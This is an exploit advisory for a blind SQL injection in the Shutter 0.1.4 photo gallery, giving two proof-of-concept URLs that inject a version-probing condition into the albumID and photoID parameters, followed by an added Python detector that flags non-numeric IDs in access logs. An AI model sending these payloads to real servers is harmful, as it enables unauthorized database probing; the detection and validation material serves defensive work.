Shutter version 0.1.4 suffers from a remote blind SQL injection vulnerability.
d4e30ff91683c82e5e49dc80891f2302d15b65436d2800c58cb775f2ba19b9ab
# Exploit Title: Shutter 0.1.4 Blind SQL Injection
# Date: March 18, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/shutter-php/files/shutter/v0.1.4/shutter_0.1.4.zip/download
# Version: 0.1.4
The albumID and photoID parameters are vulnerable to SQL Injection.
POC:
http://192.168.1.149/shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5
http://192.168.1.149/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5
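Detection sketch for the requests shown above. This is an added example, not part of the original advisory or of Shutter's code. It scans web server access logs for albumID or photoID values that are not plain integers. It assumes Apache-style request lines and that legitimate IDs are always numeric; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as injectable.
# Assumption: legitimate values are always plain decimal integers.
ID_PARAMS = ("albumID", "photoID")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return {param: decoded_value} for ID parameters that are not purely numeric."""
    hits = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in ID_PARAMS and not re.fullmatch(r"[0-9]+", value):
            hits[name] = value
    return hits

def scan_access_log(lines):
    """Return (line_number, client_ip, hits) for each request with a non-numeric ID."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        hits = suspicious_params(match.group(1))
        if hits:
            findings.append((number, line.split(" ", 1)[0], hits))
    return findings

# Constructed sample log lines; client IPs are documentation addresses.
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Mar/2010:10:00:01 +0000] "GET /shutter/admin.html?albumID=2 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [18/Mar/2010:10:00:05 +0000] "GET /shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [18/Mar/2010:10:00:06 +0000] "GET /shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5 HTTP/1.1" 200 1024',
    '198.51.100.7 - - [18/Mar/2010:10:00:09 +0000] "GET /shutter/admin.html?albumID=3&photoID=11 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for number, client, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {client} sent non-numeric {hits}")
```

The same integer-only check, applied server-side before the value reaches any query, rejects both PoC requests.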